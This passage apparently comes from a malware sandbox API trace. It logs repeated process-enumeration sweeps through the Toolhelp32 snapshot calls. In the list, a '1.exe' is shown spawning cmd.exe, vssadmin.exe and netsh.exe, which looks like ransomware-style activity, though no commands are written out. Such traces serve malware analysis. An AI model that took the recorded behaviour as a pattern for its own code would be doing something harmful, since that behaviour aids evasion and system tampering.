th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.346] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0058.347] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.347] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.348] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0058.349] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0058.350] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.350] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0058.351] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0058.352] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0058.352] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0058.353] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0058.354] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0058.354] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0058.355] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0058.356] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0058.357] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0058.772] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0058.773] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0058.773] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0058.774] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0058.775] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0058.775] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0058.776] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0058.777] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0058.778] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0058.778] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0058.779] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0058.780] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0058.780] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0058.781] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0058.782] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0058.782] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0058.783] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0058.784] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0058.784] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0058.785] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0058.786] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0058.787] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0058.788] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0058.789] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0058.790] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0058.791] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0058.792] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0058.792] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0058.793] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0058.794] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0058.795] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.796] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.797] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0058.798] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0058.798] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.799] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0058.800] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0058.801] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.802] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.803] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0058.804] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.804] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0058.805] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0059.645] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.651] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0059.651] CloseHandle (hObject=0x324) returned 1 [0059.651] Sleep (dwMilliseconds=0x1f4) [0060.492] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x338 [0060.497] Process32FirstW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0060.498] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0060.498] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.499] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.500] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.501] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.501] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.502] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.503] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.503] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.504] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0060.505] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0060.510] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.511] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.512] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.513] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.513] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.514] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.515] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.515] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.516] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.517] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: 